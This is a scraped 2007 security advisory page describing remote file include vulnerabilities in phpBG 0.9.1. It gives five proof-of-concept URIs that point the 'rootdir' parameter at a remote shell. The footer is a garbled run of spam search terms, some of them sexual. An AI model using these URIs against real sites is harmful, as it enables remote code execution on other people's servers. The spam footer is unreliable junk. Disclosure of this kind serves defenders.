about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , phpBG rootdir Multiple Remote File Include Vulnerabilities


Title phpBG rootdir Multiple Remote File Include Vulnerabilities
Published 2007-08-30-12:00AM
Updated 2007-09-04-09:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  GoLd_M is credited with the discovery of these vulnerabilities.
Vulnerable  phpBG phpBG 0.9.1
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/intern/admin/other/backup.php?admin=1&rootdir=Shell
http://www.example.com/intern/admin/?rootdir=Shell
http://www.example.com/intern/clan/member_add.php?rootdir=Shell
http://www.example.com/intern/config/key_2.php?rootdir=Shell
http://www.example.com/intern/config/forum.php?rootdir=Shell
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:00:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
CMS is Fre 2007 anti Naked Vide SexZoo Crack Data qj0801.sm1 +www.trish CMS is Fre Lingirie Interspire Sex.Vedio photo sexs 200 /compo join.html vidiossex Human sexy www.indias XXXPIC card.y6608 Sex. Com www.cnsh20 www.tuking Crack Data 200 /compo 123CLIPS www.FWGCHI www.i19910 Sex vedios news for c licai.inhe tamil actr pamelaande GAMZE pics of pu Sex pamela www.bigcoc Searching srgo.jimdo BIND 9 DNS Apache h www.hichd. Sex boys g www sex bo sexure openmap www.zxmfei Crack Data Sex arap www.lnfsw. news for \